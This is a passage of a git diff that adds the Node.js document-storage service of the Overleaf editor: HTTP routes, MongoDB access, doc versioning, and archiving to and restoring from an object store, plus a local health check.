HttpController.getAllRanges) +app.get('/project/:project_id/has-ranges', HttpController.projectHasRanges) +app.get('/project/:project_id/doc/:doc_id', HttpController.getDoc) +app.get('/project/:project_id/doc/:doc_id/deleted', HttpController.isDocDeleted) +app.get('/project/:project_id/doc/:doc_id/raw', HttpController.getRawDoc) +app.get('/project/:project_id/doc/:doc_id/peek', HttpController.peekDoc) +// Add 64kb overhead for the JSON encoding, and double the size to allow for ranges in the json payload +app.post( + '/project/:project_id/doc/:doc_id', + bodyParser.json({ limit: Settings.maxJsonRequestSize }), + HttpController.updateDoc +) +app.patch( + '/project/:project_id/doc/:doc_id', + bodyParser.json(), + validate({ + body: { + deleted: Joi.boolean(), + name: Joi.string().when('deleted', { is: true, then: Joi.required() }), + deletedAt: Joi.date().when('deleted', { is: true, then: Joi.required() }), + }, + }), + HttpController.patchDoc +) +app.delete('/project/:project_id/doc/:doc_id', (req, res) => { + res.status(500).send('DELETE-ing a doc is DEPRECATED. 
PATCH the doc instead.') +}) + +app.post('/project/:project_id/archive', HttpController.archiveAllDocs) +app.post('/project/:project_id/doc/:doc_id/archive', HttpController.archiveDoc) +app.post('/project/:project_id/unarchive', HttpController.unArchiveAllDocs) +app.post('/project/:project_id/destroy', HttpController.destroyProject) + +app.get('/health_check', HttpController.healthCheck) + +app.get('/status', (req, res) => res.send('docstore is alive')) + +app.use(handleValidationErrors()) +app.use(function (error, req, res, next) { + if (error instanceof Errors.NotFoundError) { + logger.warn({ req }, 'not found') + res.sendStatus(404) + } else if (error instanceof Errors.DocModifiedError) { + logger.warn({ req }, 'conflict: doc modified') + res.sendStatus(409) + } else if (error instanceof Errors.DocVersionDecrementedError) { + logger.warn({ req }, 'conflict: doc version decremented') + res.sendStatus(409) + } else { + logger.error({ err: error, req }, 'request errored') + res.status(500).send('Oops, something went wrong') + } +}) + +const { port } = Settings.internal.docstore +const { host } = Settings.internal.docstore + +if (!module.parent) { + // Called directly + mongoClient + .connect() + .then(() => { + const server = app.listen(port, host, function (err) { + if (err) { + logger.fatal({ err }, `Cannot bind to ${host}:${port}. Exiting.`) + process.exit(1) + } + logger.debug(`Docstore starting up, listening on ${host}:${port}`) + }) + server.timeout = 120000 + server.keepAliveTimeout = 5000 + server.requestTimeout = 60000 + server.headersTimeout = 60000 + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) +} + +module.exports = app diff --git a/services/docstore/app/js/DocArchiveManager.js b/services/docstore/app/js/DocArchiveManager.js new file mode 100644 index 0000000..4390afe --- /dev/null +++ b/services/docstore/app/js/DocArchiveManager.js @@ -0,0 +1,227 @@ +const { callbackify } = require('node:util') +const MongoManager = require('./MongoManager').promises +const Errors = require('./Errors') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const crypto = require('node:crypto') +const { ReadableString } = require('@overleaf/stream-utils') +const RangeManager = require('./RangeManager') +const PersistorManager = require('./PersistorManager') +const pMap = require('p-map') +const { streamToBuffer } = require('./StreamToBuffer').promises +const { BSON } = require('mongodb-legacy') + +const PARALLEL_JOBS = Settings.parallelArchiveJobs +const UN_ARCHIVE_BATCH_SIZE = Settings.unArchiveBatchSize + +module.exports = { + archiveAllDocs: callbackify(archiveAllDocs), + archiveDoc: callbackify(archiveDoc), + unArchiveAllDocs: callbackify(unArchiveAllDocs), + unarchiveDoc: callbackify(unarchiveDoc), + destroyProject: callbackify(destroyProject), + getDoc: callbackify(getDoc), + promises: { + archiveAllDocs, + archiveDoc, + unArchiveAllDocs, + unarchiveDoc, + destroyProject, + getDoc, + }, +} + +async function archiveAllDocs(projectId) { + if (!_isArchivingEnabled()) { + return + } + + const docIds = await MongoManager.getNonArchivedProjectDocIds(projectId) + await pMap(docIds, docId => archiveDoc(projectId, docId), { + concurrency: PARALLEL_JOBS, + }) +} + +async function archiveDoc(projectId, docId) { + if (!_isArchivingEnabled()) { + return + } + + const doc = await MongoManager.getDocForArchiving(projectId, docId) + + if (!doc) { + // The doc wasn't found, it was already archived, or the 
lock couldn't be + // acquired. Since we don't know which it is, silently return. + return + } + + logger.debug({ projectId, docId: doc._id }, 'sending doc to persistor') + const key = `${projectId}/${doc._id}` + + if (doc.lines == null) { + throw new Error('doc has no lines') + } + + // warn about any oversized docs already in mongo + const linesSize = BSON.calculateObjectSize(doc.lines || {}) + const rangesSize = BSON.calculateObjectSize(doc.ranges || {}) + if ( + linesSize > Settings.max_doc_length || + rangesSize > Settings.max_doc_length + ) { + logger.warn( + { projectId, docId: doc._id, linesSize, rangesSize }, + 'large doc found when archiving project' + ) + } + + const json = JSON.stringify({ + lines: doc.lines, + ranges: doc.ranges, + rev: doc.rev, + schema_v: 1, + }) + + // this should never happen, but protects against memory-corruption errors that + // have happened in the past + if (json.indexOf('\u0000') > -1) { + const error = new Error('null bytes detected') + logger.err({ err: error, doc }, error.message) + throw error + } + + const md5 = crypto.createHash('md5').update(json).digest('hex') + const stream = new ReadableString(json) + await PersistorManager.sendStream(Settings.docstore.bucket, key, stream, { + sourceMd5: md5, + }) + await MongoManager.markDocAsArchived(projectId, docId, doc.rev) +} + +async function unArchiveAllDocs(projectId) { + if (!_isArchivingEnabled()) { + return + } + + while (true) { + let docs + if (Settings.docstore.keepSoftDeletedDocsArchived) { + docs = await MongoManager.getNonDeletedArchivedProjectDocs( + projectId, + UN_ARCHIVE_BATCH_SIZE + ) + } else { + docs = await MongoManager.getArchivedProjectDocs( + projectId, + UN_ARCHIVE_BATCH_SIZE + ) + } + if (!docs || docs.length === 0) { + break + } + await pMap(docs, doc => unarchiveDoc(projectId, doc._id), { + concurrency: PARALLEL_JOBS, + }) + } +} + +// get the doc from the PersistorManager without storing it in mongo +async function getDoc(projectId, docId) { + const key = `${projectId}/${docId}` + const sourceMd5 = await PersistorManager.getObjectMd5Hash( + Settings.docstore.bucket, + key + ) + const stream = await PersistorManager.getObjectStream( + Settings.docstore.bucket, + key + ) + stream.resume() + const buffer = await streamToBuffer(projectId, docId, stream) + const md5 = crypto.createHash('md5').update(buffer).digest('hex') + if (sourceMd5 !== md5) { + throw new Errors.Md5MismatchError('md5 mismatch when downloading doc', { + key, + sourceMd5, + md5, + }) + } + + return _deserializeArchivedDoc(buffer) +} + +// get the doc and unarchive it to mongo +async function unarchiveDoc(projectId, docId) { + logger.debug({ projectId, docId }, 'getting doc from persistor') + const mongoDoc = await MongoManager.findDoc(projectId, docId, { + inS3: 1, + rev: 1, + }) + if (!mongoDoc.inS3) { + // The doc is already unarchived + return + } + + if (!_isArchivingEnabled()) { + throw new Error( + 'found archived doc, but archiving backend is not configured' + ) + } + + const archivedDoc = await getDoc(projectId, docId) + if (archivedDoc.rev == null) { + // Older archived docs didn't have a rev. Assume that the rev of the + // archived doc is the rev that was stored in Mongo when we retrieved it + // earlier. 
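+    // (Illustrative assumption: a legacy payload may deserialize to just
+    //   { lines: ['foo', 'bar'], ranges: {}, schema_v: 1 }
+    // or even a bare array of lines, with no `rev` field at all, hence the
+    // fallback to the rev we read from Mongo above.)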
+ archivedDoc.rev = mongoDoc.rev + } + await MongoManager.restoreArchivedDoc(projectId, docId, archivedDoc) +} + +async function destroyProject(projectId) { + const tasks = [MongoManager.destroyProject(projectId)] + if (_isArchivingEnabled()) { + tasks.push( + PersistorManager.deleteDirectory(Settings.docstore.bucket, projectId) + ) + } + await Promise.all(tasks) +} + +function _deserializeArchivedDoc(buffer) { + const doc = JSON.parse(buffer) + + const result = {} + if (doc.schema_v === 1 && doc.lines != null) { + result.lines = doc.lines + if (doc.ranges != null) { + result.ranges = RangeManager.jsonRangesToMongo(doc.ranges) + } + } else if (Array.isArray(doc)) { + result.lines = doc + } else { + throw new Error("I don't understand the doc format in s3") + } + + if (doc.rev != null) { + result.rev = doc.rev + } + + return result +} + +function _isArchivingEnabled() { + const backend = Settings.docstore.backend + + if (!backend) { + return false + } + + // The default backend is S3. If another backend is configured or the S3 + // backend itself is correctly configured, then archiving is enabled. + if (backend === 's3' && Settings.docstore.s3 == null) { + return false + } + + return true +} diff --git a/services/docstore/app/js/DocManager.js b/services/docstore/app/js/DocManager.js new file mode 100644 index 0000000..a9ed994 --- /dev/null +++ b/services/docstore/app/js/DocManager.js @@ -0,0 +1,297 @@ +const MongoManager = require('./MongoManager') +const Errors = require('./Errors') +const logger = require('@overleaf/logger') +const _ = require('lodash') +const DocArchive = require('./DocArchiveManager') +const RangeManager = require('./RangeManager') +const Settings = require('@overleaf/settings') +const { callbackifyAll } = require('@overleaf/promise-utils') +const { setTimeout } = require('node:timers/promises') + +/** + * @import { Document } from 'mongodb' + * @import { WithId } from 'mongodb' + */ + +const DocManager = { + /** + * @param {string} projectId + * @param {string} docId + * @param {{inS3: boolean}} filter + * @returns {Promise<WithId<Document>>} + * @private + */ + async _getDoc(projectId, docId, filter) { + if (filter == null) { + filter = {} + } + if (filter.inS3 !== true) { + throw new Error('must include inS3 when getting doc') + } + + const doc = await MongoManager.promises.findDoc(projectId, docId, filter) + + if (doc == null) { + throw new Errors.NotFoundError( + `No such doc: ${docId} in project ${projectId}` + ) + } + + if (doc.inS3) { + await DocArchive.promises.unarchiveDoc(projectId, docId) + return await DocManager._getDoc(projectId, docId, filter) + } + + return doc + }, + + async isDocDeleted(projectId, docId) { + const doc = await MongoManager.promises.findDoc(projectId, docId, { + deleted: true, + }) + + if (!doc) { + throw new Errors.NotFoundError( + `No such project/doc: ${projectId}/${docId}` + ) + } + + // `doc.deleted` is `undefined` for non deleted docs + return Boolean(doc.deleted) + }, + + async getFullDoc(projectId, docId) { + const doc = await DocManager._getDoc(projectId, docId, { + lines: true, + rev: true, + deleted: true, + version: true, + ranges: true, + inS3: true, + }) + return doc + }, + + // returns the doc without any version information + async _peekRawDoc(projectId, docId) { + const doc = await MongoManager.promises.findDoc(projectId, docId, { + lines: true, + rev: true, + deleted: true, + version: true, + ranges: true, + inS3: true, + }) + + if (doc == null) { + throw new Errors.NotFoundError( + `No such doc: ${docId} in project 
${projectId}` + ) + } + + if (doc.inS3) { + // skip the unarchiving to mongo when getting a doc + const archivedDoc = await DocArchive.promises.getDoc(projectId, docId) + Object.assign(doc, archivedDoc) + } + + return doc + }, + + // get the doc from mongo if possible, or from the persistent store otherwise, + // without unarchiving it (avoids unnecessary writes to mongo) + async peekDoc(projectId, docId) { + const doc = await DocManager._peekRawDoc(projectId, docId) + await MongoManager.promises.checkRevUnchanged(doc) + return doc + }, + + async getDocLines(projectId, docId) { + const doc = await DocManager._getDoc(projectId, docId, { + lines: true, + inS3: true, + }) + return doc + }, + + async getAllDeletedDocs(projectId, filter) { + return await MongoManager.promises.getProjectsDeletedDocs(projectId, filter) + }, + + async getAllNonDeletedDocs(projectId, filter) { + await DocArchive.promises.unArchiveAllDocs(projectId) + const docs = await MongoManager.promises.getProjectsDocs( + projectId, + { include_deleted: false }, + filter + ) + if (docs == null) { + throw new Errors.NotFoundError(`No docs for project ${projectId}`) + } + return docs + }, + + async projectHasRanges(projectId) { + const docs = await MongoManager.promises.getProjectsDocs( + projectId, + {}, + { _id: 1 } + ) + const docIds = docs.map(doc => doc._id) + for (const docId of docIds) { + const doc = await DocManager.peekDoc(projectId, docId) + if ( + (doc.ranges?.comments != null && doc.ranges.comments.length > 0) || + (doc.ranges?.changes != null && doc.ranges.changes.length > 0) + ) { + return true + } + } + return false + }, + + async updateDoc(projectId, docId, lines, version, ranges) { + const MAX_ATTEMPTS = 2 + for (let attempt = 1; attempt <= MAX_ATTEMPTS; attempt++) { + try { + const { modified, rev } = await DocManager._tryUpdateDoc( + projectId, + docId, + lines, + version, + ranges + ) + return { modified, rev } + } catch (err) { + if (err instanceof Errors.DocRevValueError && attempt < MAX_ATTEMPTS) { + // Another updateDoc call was racing with ours. + // Retry once in a bit. + logger.warn( + { projectId, docId, err }, + 'detected concurrent updateDoc call' + ) + await setTimeout(100 + Math.random() * 100) + continue + } else { + throw err + } + } + } + }, + + async _tryUpdateDoc(projectId, docId, lines, version, ranges) { + if (lines == null || version == null || ranges == null) { + throw new Error('no lines, version or ranges provided') + } + + let doc + try { + doc = await DocManager._getDoc(projectId, docId, { + version: true, + rev: true, + lines: true, + ranges: true, + inS3: true, + }) + } catch (err) { + if (err instanceof Errors.NotFoundError) { + doc = null + } else { + throw err + } + } + + ranges = RangeManager.jsonRangesToMongo(ranges) + + let updateLines, updateRanges, updateVersion + if (doc == null) { + // If the document doesn't exist, we'll make sure to create/update all parts of it. + updateLines = true + updateVersion = true + updateRanges = true + } else { + if (doc.version > version) { + // Reject update when the version was decremented. + // Potential reasons: racing flush, broken history. 
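+        // e.g. a stale flush carrying version 7 must not overwrite content
+        // that is already at version 9; app.js maps this error to a 409.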
+ throw new Errors.DocVersionDecrementedError('rejecting stale update', { + updateVersion: version, + flushedVersion: doc.version, + }) + } + updateLines = !_.isEqual(doc.lines, lines) + updateVersion = doc.version !== version + updateRanges = RangeManager.shouldUpdateRanges(doc.ranges, ranges) + } + + let modified = false + let rev = doc?.rev || 0 + + if (updateLines || updateRanges || updateVersion) { + const update = {} + if (updateLines) { + update.lines = lines + } + if (updateRanges) { + update.ranges = ranges + } + if (updateVersion) { + update.version = version + } + logger.debug( + { projectId, docId, oldVersion: doc?.version, newVersion: version }, + 'updating doc' + ) + + if (updateLines || updateRanges) { + rev += 1 // rev will be incremented in mongo by MongoManager.upsertIntoDocCollection + } + + modified = true + await MongoManager.promises.upsertIntoDocCollection( + projectId, + docId, + doc?.rev, + update + ) + } else { + logger.debug({ projectId, docId }, 'doc has not changed - not updating') + } + + return { modified, rev } + }, + + async patchDoc(projectId, docId, meta) { + const projection = { _id: 1, deleted: true } + const doc = await MongoManager.promises.findDoc( + projectId, + docId, + projection + ) + if (!doc) { + throw new Errors.NotFoundError( + `No such project/doc to delete: ${projectId}/${docId}` + ) + } + + if (meta.deleted && Settings.docstore.archiveOnSoftDelete) { + // The user will not read this doc anytime soon. Flush it out of mongo. + DocArchive.promises.archiveDoc(projectId, docId).catch(err => { + logger.warn( + { projectId, docId, err }, + 'archiving a single doc in the background failed' + ) + }) + } + + await MongoManager.promises.patchDoc(projectId, docId, meta) + }, +} + +module.exports = { + ...callbackifyAll(DocManager, { + multiResult: { + updateDoc: ['modified', 'rev'], + }, + }), + promises: DocManager, +} diff --git a/services/docstore/app/js/Errors.js b/services/docstore/app/js/Errors.js new file mode 100644 index 0000000..bbdbe75 --- /dev/null +++ b/services/docstore/app/js/Errors.js @@ -0,0 +1,19 @@ +// import Errors from object-persistor to pass instanceof checks +const OError = require('@overleaf/o-error') +const { Errors } = require('@overleaf/object-persistor') + +class Md5MismatchError extends OError {} + +class DocModifiedError extends OError {} + +class DocRevValueError extends OError {} + +class DocVersionDecrementedError extends OError {} + +module.exports = { + Md5MismatchError, + DocModifiedError, + DocRevValueError, + DocVersionDecrementedError, + ...Errors, +} diff --git a/services/docstore/app/js/HealthChecker.js b/services/docstore/app/js/HealthChecker.js new file mode 100644 index 0000000..34cd5c9 --- /dev/null +++ b/services/docstore/app/js/HealthChecker.js @@ -0,0 +1,67 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
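+// The check below round-trips a throwaway doc through the local HTTP API:
+// it POSTs random smoke-test lines, GETs them back and compares, then
+// removes the doc directly from Mongo.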
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { db, ObjectId } = require('./mongodb') +const request = require('request') +const async = require('async') +const _ = require('lodash') +const crypto = require('node:crypto') +const settings = require('@overleaf/settings') +const { port } = settings.internal.docstore +const logger = require('@overleaf/logger') + +module.exports = { + check(callback) { + const docId = new ObjectId() + const projectId = new ObjectId(settings.docstore.healthCheck.project_id) + const url = `http://127.0.0.1:${port}/project/${projectId}/doc/${docId}` + const lines = [ + 'smoke test - delete me', + `${crypto.randomBytes(32).toString('hex')}`, + ] + const getOpts = () => ({ + url, + timeout: 3000, + }) + logger.debug({ lines, url, docId, projectId }, 'running health check') + const jobs = [ + function (cb) { + const opts = getOpts() + opts.json = { lines, version: 42, ranges: {} } + return request.post(opts, cb) + }, + function (cb) { + const opts = getOpts() + opts.json = true + return request.get(opts, function (err, res, body) { + if (err != null) { + logger.err({ err }, 'docstore returned a error in health check get') + return cb(err) + } else if (res == null) { + return cb(new Error('no response from docstore with get check')) + } else if ((res != null ? res.statusCode : undefined) !== 200) { + return cb(new Error(`status code not 200, its ${res.statusCode}`)) + } else if ( + _.isEqual(body != null ? body.lines : undefined, lines) && + (body != null ? body._id : undefined) === docId.toString() + ) { + return cb() + } else { + return cb( + new Error( + `health check lines not equal ${body.lines} != ${lines}` + ) + ) + } + }) + }, + cb => db.docs.deleteOne({ _id: docId, project_id: projectId }, cb), + ] + return async.series(jobs, callback) + }, +} diff --git a/services/docstore/app/js/HttpController.js b/services/docstore/app/js/HttpController.js new file mode 100644 index 0000000..1c4e137 --- /dev/null +++ b/services/docstore/app/js/HttpController.js @@ -0,0 +1,319 @@ +const DocManager = require('./DocManager') +const logger = require('@overleaf/logger') +const DocArchive = require('./DocArchiveManager') +const HealthChecker = require('./HealthChecker') +const Errors = require('./Errors') +const Settings = require('@overleaf/settings') + +function getDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + const includeDeleted = req.query.include_deleted === 'true' + logger.debug({ projectId, docId }, 'getting doc') + DocManager.getFullDoc(projectId, docId, function (error, doc) { + if (error) { + return next(error) + } + logger.debug({ docId, projectId }, 'got doc') + if (doc == null) { + res.sendStatus(404) + } else if (doc.deleted && !includeDeleted) { + res.sendStatus(404) + } else { + res.json(_buildDocView(doc)) + } + }) +} + +function peekDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + logger.debug({ projectId, docId }, 'peeking doc') + DocManager.peekDoc(projectId, docId, function (error, doc) { + if (error) { + return next(error) + } + if (doc == null) { + res.sendStatus(404) + } else { + res.setHeader('x-doc-status', doc.inS3 ? 
'archived' : 'active') + res.json(_buildDocView(doc)) + } + }) +} + +function isDocDeleted(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + DocManager.isDocDeleted(projectId, docId, function (error, deleted) { + if (error) { + return next(error) + } + res.json({ deleted }) + }) +} + +function getRawDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + logger.debug({ projectId, docId }, 'getting raw doc') + DocManager.getDocLines(projectId, docId, function (error, doc) { + if (error) { + return next(error) + } + if (doc == null) { + res.sendStatus(404) + } else { + res.setHeader('content-type', 'text/plain') + res.send(_buildRawDocView(doc)) + } + }) +} + +function getAllDocs(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'getting all docs') + DocManager.getAllNonDeletedDocs( + projectId, + { lines: true, rev: true }, + function (error, docs) { + if (docs == null) { + docs = [] + } + if (error) { + return next(error) + } + const docViews = _buildDocsArrayView(projectId, docs) + for (const docView of docViews) { + if (!docView.lines) { + logger.warn({ projectId, docId: docView._id }, 'missing doc lines') + docView.lines = [] + } + } + res.json(docViews) + } + ) +} + +function getAllDeletedDocs(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'getting all deleted docs') + DocManager.getAllDeletedDocs( + projectId, + { name: true, deletedAt: true }, + function (error, docs) { + if (error) { + return next(error) + } + res.json( + docs.map(doc => ({ + _id: doc._id.toString(), + name: doc.name, + deletedAt: doc.deletedAt, + })) + ) + } + ) +} + +function getAllRanges(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'getting all ranges') + DocManager.getAllNonDeletedDocs( + projectId, + { ranges: true }, + function (error, docs) { + if (docs == null) { + docs = [] + } + if (error) { + return next(error) + } + res.json(_buildDocsArrayView(projectId, docs)) + } + ) +} + +function projectHasRanges(req, res, next) { + const { project_id: projectId } = req.params + DocManager.projectHasRanges(projectId, (err, projectHasRanges) => { + if (err) { + return next(err) + } + res.json({ projectHasRanges }) + }) +} + +function updateDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + const lines = req.body?.lines + const version = req.body?.version + const ranges = req.body?.ranges + + if (lines == null || !(lines instanceof Array)) { + logger.error({ projectId, docId }, 'no doc lines provided') + res.sendStatus(400) // Bad Request + return + } + + if (version == null || typeof version !== 'number') { + logger.error({ projectId, docId }, 'no doc version provided') + res.sendStatus(400) // Bad Request + return + } + + if (ranges == null) { + logger.error({ projectId, docId }, 'no doc ranges provided') + res.sendStatus(400) // Bad Request + return + } + + const bodyLength = lines.reduce((len, line) => line.length + len, 0) + if (bodyLength > Settings.max_doc_length) { + logger.error({ projectId, docId, bodyLength }, 'document body too large') + res.status(413).send('document body too large') + return + } + + logger.debug({ projectId, docId }, 'got http request to update doc') + DocManager.updateDoc( + projectId, + docId, + lines, + version, + ranges, + function (error, modified, rev) { + if (error) { + return next(error) + } + res.json({ + modified, + rev, + }) + } + ) +} + 
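+// Illustrative request/response for the updateDoc endpoint above (example
+// values only, not part of the original source):
+//
+//   POST /project/:project_id/doc/:doc_id
+//   { "lines": ["Hello", "world"], "version": 3, "ranges": {} }
+//   => 200 { "modified": true, "rev": 2 }
+//
+// Bodies whose summed line length exceeds Settings.max_doc_length are
+// rejected with 413 before DocManager is called.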
+function patchDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + logger.debug({ projectId, docId }, 'patching doc') + + const allowedFields = ['deleted', 'deletedAt', 'name'] + const meta = {} + Object.entries(req.body).forEach(([field, value]) => { + if (allowedFields.includes(field)) { + meta[field] = value + } else { + logger.fatal({ field }, 'joi validation for pathDoc is broken') + } + }) + DocManager.patchDoc(projectId, docId, meta, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function _buildDocView(doc) { + const docView = { _id: doc._id?.toString() } + for (const attribute of ['lines', 'rev', 'version', 'ranges', 'deleted']) { + if (doc[attribute] != null) { + docView[attribute] = doc[attribute] + } + } + return docView +} + +function _buildRawDocView(doc) { + return (doc?.lines ?? []).join('\n') +} + +function _buildDocsArrayView(projectId, docs) { + const docViews = [] + for (const doc of docs) { + if (doc != null) { + // There can end up being null docs for some reason :( (probably a race condition) + docViews.push(_buildDocView(doc)) + } else { + logger.error( + { err: new Error('null doc'), projectId }, + 'encountered null doc' + ) + } + } + return docViews +} + +function archiveAllDocs(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'archiving all docs') + DocArchive.archiveAllDocs(projectId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function archiveDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + logger.debug({ projectId, docId }, 'archiving a doc') + DocArchive.archiveDoc(projectId, docId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function unArchiveAllDocs(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'unarchiving all docs') + DocArchive.unArchiveAllDocs(projectId, function (err) { + if (err) { + if (err instanceof Errors.DocRevValueError) { + logger.warn({ err }, 'Failed to unarchive doc') + return res.sendStatus(409) + } + return next(err) + } + res.sendStatus(200) + }) +} + +function destroyProject(req, res, next) { + const { project_id: projectId } = req.params + logger.debug({ projectId }, 'destroying all docs') + DocArchive.destroyProject(projectId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function healthCheck(req, res) { + HealthChecker.check(function (err) { + if (err) { + logger.err({ err }, 'error performing health check') + res.sendStatus(500) + } else { + res.sendStatus(200) + } + }) +} + +module.exports = { + getDoc, + peekDoc, + isDocDeleted, + getRawDoc, + getAllDocs, + getAllDeletedDocs, + getAllRanges, + projectHasRanges, + updateDoc, + patchDoc, + archiveAllDocs, + archiveDoc, + unArchiveAllDocs, + destroyProject, + healthCheck, +} diff --git a/services/docstore/app/js/MongoManager.js b/services/docstore/app/js/MongoManager.js new file mode 100644 index 0000000..ad1a2d2 --- /dev/null +++ b/services/docstore/app/js/MongoManager.js @@ -0,0 +1,274 @@ +const { db, ObjectId } = require('./mongodb') +const Settings = require('@overleaf/settings') +const Errors = require('./Errors') +const { callbackify } = require('node:util') + +const ARCHIVING_LOCK_DURATION_MS = Settings.archivingLockDurationMs + +async function findDoc(projectId, docId, projection) { + const doc = await db.docs.findOne( + { + _id: 
new ObjectId(docId.toString()), + project_id: new ObjectId(projectId.toString()), + }, + { projection } + ) + if (doc && projection.version && !doc.version) { + doc.version = 0 + } + return doc +} + +async function getProjectsDeletedDocs(projectId, projection) { + const docs = await db.docs + .find( + { + project_id: new ObjectId(projectId.toString()), + deleted: true, + }, + { + projection, + sort: { deletedAt: -1 }, + limit: Settings.max_deleted_docs, + } + ) + .toArray() + return docs +} + +async function getProjectsDocs(projectId, options, projection) { + const query = { project_id: new ObjectId(projectId.toString()) } + if (!options.include_deleted) { + query.deleted = { $ne: true } + } + const queryOptions = { + projection, + } + if (options.limit) { + queryOptions.limit = options.limit + } + const docs = await db.docs.find(query, queryOptions).toArray() + return docs +} + +async function getArchivedProjectDocs(projectId, maxResults) { + const query = { + project_id: new ObjectId(projectId.toString()), + inS3: true, + } + const docs = await db.docs + .find(query, { projection: { _id: 1 }, limit: maxResults }) + .toArray() + return docs +} + +async function getNonArchivedProjectDocIds(projectId) { + const docs = await db.docs + .find( + { + project_id: new ObjectId(projectId), + inS3: { $ne: true }, + }, + { projection: { _id: 1 } } + ) + .map(doc => doc._id) + .toArray() + return docs +} + +async function getNonDeletedArchivedProjectDocs(projectId, maxResults) { + const query = { + project_id: new ObjectId(projectId.toString()), + deleted: { $ne: true }, + inS3: true, + } + const docs = await db.docs + .find(query, { projection: { _id: 1 }, limit: maxResults }) + .toArray() + return docs +} + +async function upsertIntoDocCollection(projectId, docId, previousRev, updates) { + if (previousRev) { + const update = { + $set: updates, + $unset: { inS3: true }, + } + if (updates.lines || updates.ranges) { + update.$inc = { rev: 1 } + } + const result = await db.docs.updateOne( + { + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + rev: previousRev, + }, + update + ) + if (result.matchedCount !== 1) { + throw new Errors.DocRevValueError() + } + } else { + try { + await db.docs.insertOne({ + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + rev: 1, + ...updates, + }) + } catch (err) { + if (err.code === 11000) { + // duplicate doc _id + throw new Errors.DocRevValueError() + } else { + throw err + } + } + } +} + +async function patchDoc(projectId, docId, meta) { + await db.docs.updateOne( + { + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + }, + { $set: meta } + ) +} + +/** + * Fetch a doc and lock it for archiving + * + * This will return null if the doc is not found, if it's already archived or + * if the lock can't be acquired. 
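+ *
+ * The lock is a best-effort `archivingUntil` timestamp: the query below
+ * only matches docs whose lock is absent or already expired, so concurrent
+ * archivers skip docs that another worker is still processing.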
+ */ +async function getDocForArchiving(projectId, docId) { + const archivingUntil = new Date(Date.now() + ARCHIVING_LOCK_DURATION_MS) + const result = await db.docs.findOneAndUpdate( + { + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + inS3: { $ne: true }, + $or: [{ archivingUntil: null }, { archivingUntil: { $lt: new Date() } }], + }, + { $set: { archivingUntil } }, + { + projection: { lines: 1, ranges: 1, rev: 1 }, + includeResultMetadata: true, + } + ) + return result.value +} + +/** + * Clear the doc contents from Mongo and release the archiving lock + */ +async function markDocAsArchived(projectId, docId, rev) { + await db.docs.updateOne( + { _id: new ObjectId(docId), rev }, + { + $set: { inS3: true }, + $unset: { lines: 1, ranges: 1, archivingUntil: 1 }, + } + ) +} + +/** + * Restore an archived doc + * + * This checks that the archived doc's rev matches. + */ +async function restoreArchivedDoc(projectId, docId, archivedDoc) { + const query = { + _id: new ObjectId(docId), + project_id: new ObjectId(projectId), + rev: archivedDoc.rev, + } + const update = { + $set: { + lines: archivedDoc.lines, + ranges: archivedDoc.ranges || {}, + }, + $unset: { + inS3: true, + }, + } + const result = await db.docs.updateOne(query, update) + + if (result.matchedCount === 0) { + throw new Errors.DocRevValueError('failed to unarchive doc', { + docId, + rev: archivedDoc.rev, + }) + } +} + +async function getDocRev(docId) { + const doc = await db.docs.findOne( + { _id: new ObjectId(docId.toString()) }, + { projection: { rev: 1 } } + ) + return doc && doc.rev +} + +/** + * Helper method to support optimistic locking. + * + * Check that the rev of an existing doc is unchanged. If the rev has + * changed, return a DocModifiedError. + */ +async function checkRevUnchanged(doc) { + const currentRev = await getDocRev(doc._id) + if (isNaN(currentRev) || isNaN(doc.rev)) { + throw new Errors.DocRevValueError('doc rev is NaN', { + doc_id: doc._id, + rev: doc.rev, + currentRev, + }) + } + if (doc.rev !== currentRev) { + throw new Errors.DocModifiedError('doc rev has changed', { + doc_id: doc._id, + rev: doc.rev, + currentRev, + }) + } +} + +async function destroyProject(projectId) { + await db.docs.deleteMany({ project_id: new ObjectId(projectId) }) +} + +module.exports = { + findDoc: callbackify(findDoc), + getProjectsDeletedDocs: callbackify(getProjectsDeletedDocs), + getProjectsDocs: callbackify(getProjectsDocs), + getArchivedProjectDocs: callbackify(getArchivedProjectDocs), + getNonArchivedProjectDocIds: callbackify(getNonArchivedProjectDocIds), + getNonDeletedArchivedProjectDocs: callbackify( + getNonDeletedArchivedProjectDocs + ), + upsertIntoDocCollection: callbackify(upsertIntoDocCollection), + restoreArchivedDoc: callbackify(restoreArchivedDoc), + patchDoc: callbackify(patchDoc), + getDocForArchiving: callbackify(getDocForArchiving), + markDocAsArchived: callbackify(markDocAsArchived), + checkRevUnchanged: callbackify(checkRevUnchanged), + destroyProject: callbackify(destroyProject), + promises: { + findDoc, + getProjectsDeletedDocs, + getProjectsDocs, + getArchivedProjectDocs, + getNonArchivedProjectDocIds, + getNonDeletedArchivedProjectDocs, + upsertIntoDocCollection, + restoreArchivedDoc, + patchDoc, + getDocForArchiving, + 